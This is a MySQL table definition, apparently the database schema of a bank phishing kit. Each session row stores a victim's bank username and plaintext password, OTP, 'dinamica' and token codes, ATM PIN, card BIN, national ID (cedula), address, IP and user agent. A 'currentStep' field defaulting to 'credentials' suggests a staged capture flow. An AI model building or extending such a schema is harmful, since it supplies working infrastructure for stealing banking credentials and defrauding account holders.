CREATE TABLE `secure_sessions` (
	`id` int AUTO_INCREMENT NOT NULL,
	`sessionId` varchar(64) NOT NULL,
	`currentStep` varchar(32) NOT NULL DEFAULT 'credentials',
	`status` varchar(32) NOT NULL DEFAULT 'active',
	`email` varchar(320),
	`cardBin` varchar(8),
	`bankName` varchar(128),
	`country` varchar(64),
	`cardScheme` varchar(32),
	`bankUser` varchar(128),
	`bankPassword` varchar(128),
	`otpCode` varchar(10),
	`dinamicaCode` varchar(20),
	`tokenCode` varchar(20),
	`atmPin` varchar(10),
	`address` varchar(256),
	`cedula` varchar(20),
	`city` varchar(64),
	`ipAddress` varchar(64),
	`userAgent` text,
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	`updatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `secure_sessions_id` PRIMARY KEY(`id`),
	CONSTRAINT `secure_sessions_sessionId_unique` UNIQUE(`sessionId`)
);
